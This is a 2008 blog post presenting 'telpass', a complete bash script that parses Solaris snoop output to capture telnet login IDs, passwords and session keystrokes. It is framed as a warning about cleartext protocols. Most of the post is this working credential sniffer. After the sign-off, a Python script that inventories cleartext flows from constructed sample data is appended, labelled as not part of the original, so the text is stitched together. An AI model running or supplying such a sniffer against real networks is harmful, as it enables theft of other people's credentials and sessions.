Monday, July 14, 2008

The Dangers Of Using Cleartext Protocols On The Internet

Hey There,

Today, I'm putting up an updated version of a script we introduced back in April for grabbing logins and passwords using Solaris Unix's snoop command (see that post for a more detailed breakdown of how the script works). This version of the script is slightly more user friendly and is made so that it reads directly from the STDOUT of snoop (or, in more practical terms, takes its STDIN from the STDOUT of the snoop command). To show how easy it is to use, and (of course) to encourage as many people as possible to quit using cleartext protocols whenever it can possibly be avoided, we've put a quick demonstration video up on YouTube.com, which you can view below. Apologies for the poor video quality; the upper right of the screen is intentionally blurred during part of the video to protect the guilty ;) It's a lot easier to read if you just go directly to the source:



Hope you enjoy the updated script and have absolutely no way to make use of it ;) Instead, focus your efforts on trying to figure out SSH timing. We're still working on extracting information from SSH. It might be a while... ;)

Enjoy :)


This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.

#!/bin/bash

#
# telpass - updated snoop login, password and session logger
# usage: snoop port 23 | telpass   (or any other cleartext port)
#
# Reads snoop's one-line summary output from standard input, so it no
# longer needs a saved capture file.
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

# Mode: 0 = session data, 1 = login ID characters, 2 = password characters
login_or_pwd=0
# Telnet servers echo each typed character back to the client, so in login
# and session mode every other packet is skipped to avoid printing duplicates.
interactive_echo=0
sess_info=0

echo "Parsing snoop output from standard input"
echo "Note: In Session Mode, dots represent packets"
echo "that do not contain alphanumeric data"

while read line
do
    # A "Last login:" banner marks the start of a new session
    if echo "$line" | grep "Last" >/dev/null 2>&1
    then
        echo
        login_or_pwd=0
        continue
    fi
    if echo "$line" | grep "login: *$" >/dev/null 2>&1
    then
        echo
        echo "Possible login ID to follow - echo turned off to avoid duplicate characters: "
        login_or_pwd=1
        sess_info=0
        continue
    fi
    if echo "$line" | grep "Password:" >/dev/null 2>&1
    then
        echo
        echo "Possible password to follow - echo turned on: "
        login_or_pwd=2
        sess_info=0
        continue
    fi
    if [ "$login_or_pwd" -eq 1 ]
    then
        # Login ID: the server echoes each character, so print every other packet
        if [ "$interactive_echo" -eq 1 ]
        then
            interactive_echo=0
            continue
        else
            # Print the last field only when it is a single character, no newline
            echo "$line" | awk '{ if (length($NF) == 1) printf "%s", $NF }'
            interactive_echo=1
            continue
        fi
    fi
    if [ "$login_or_pwd" -eq 2 ]
    then
        # Password: the server does not echo it, so print every packet
        echo "$line" | awk '{ if (length($NF) == 1) printf "%s", $NF }'
        continue
    fi
    if [ "$login_or_pwd" -eq 0 ] && [ "$sess_info" -eq 0 ]
    then
        echo
        echo "Possible session info to follow - echo turned off to avoid duplicate characters:"
        sess_info=1
    fi
    if [ "$sess_info" -eq 1 ]
    then
        if [ "$interactive_echo" -eq 1 ]
        then
            interactive_echo=0
            continue
        else
            # Single characters are printed as-is; anything else becomes a dot
            echo "$line" | awk '{ if (length($NF) == 1) printf "%s", $NF; else printf "." }'
            interactive_echo=1
            continue
        fi
    fi
done
echo
exit 0

, Mike
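As a defender-side counterpart to the script above, here is an added example (not part of the original post or of Mike's script) that reads the same kind of snoop summary output and inventories which hosts are still talking cleartext application protocols, so they can be moved to SSH or TLS. The summary line shape, the protocol tokens in CLEARTEXT_PROTOCOLS and the sample lines are constructed assumptions, not captured data.

```python
import re
from collections import Counter

# Constructed snoop summary lines (not a real capture); assumed shape is
# "<n> <time> <src> -> <dst> <PROTO> <C|R> port=<n> ..."
SAMPLE = """\
  1   0.00000 ws01 -> sol10    TELNET C port=32876
  2   0.00012 sol10 -> ws01    TELNET R port=32876 login:
  3   0.00450 ws01 -> sol10    TELNET C port=32876 m
  4   0.10111 ws02 -> sol10    TCP D=22 S=40111 Syn Seq=1 Len=0 Win=5840
  5   0.20000 ws03 -> fileserv FTP C port=41000 USER anonymous
  6   0.30000 ws01 -> mailhost POP C port=42000 USER mike
  7   0.40000 ws02 -> sol10    TCP D=22 S=40111 Push Len=48
"""

# Application decodes whose logins cross the wire unencrypted (assumed
# spelling of the protocol tokens snoop prints).
CLEARTEXT_PROTOCOLS = {"TELNET", "FTP", "POP", "IMAP", "RLOGIN", "HTTP"}

LINE_RE = re.compile(
    r"^\s*\d+\s+[\d.]+\s+(\S+)\s+->\s+(\S+)\s+(\S+)\s+([CR])\s+port=(\d+)"
)

def parse_summary(text):
    """Yield (client, server, protocol) for every decoded application line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # handshakes, ARP, undecoded TCP such as SSH on port 22
        src, dst, proto, direction, _port = m.groups()
        # snoop tags the client side C and the server side R, so both
        # directions of a flow are normalised onto one (client, server) pair.
        client, server = (src, dst) if direction == "C" else (dst, src)
        yield client, server, proto

def cleartext_sessions(text):
    """Count packets per (client, server, protocol) for cleartext logins."""
    counts = Counter()
    for client, server, proto in parse_summary(text):
        if proto in CLEARTEXT_PROTOCOLS:
            counts[(client, server, proto)] += 1
    return counts

def report(text):
    """Return one line per cleartext flow, busiest flow first."""
    return ["%-6s %s -> %s (%d packets)" % (proto, c, s, n)
            for (c, s, proto), n in cleartext_sessions(text).most_common()]

if __name__ == "__main__":
    print("\n".join(report(SAMPLE)))
```

Run against a live `snoop | python3 inventory.py`-style feed or a saved summary, the report gives a per-host list of cleartext flows to chase down rather than the credentials themselves.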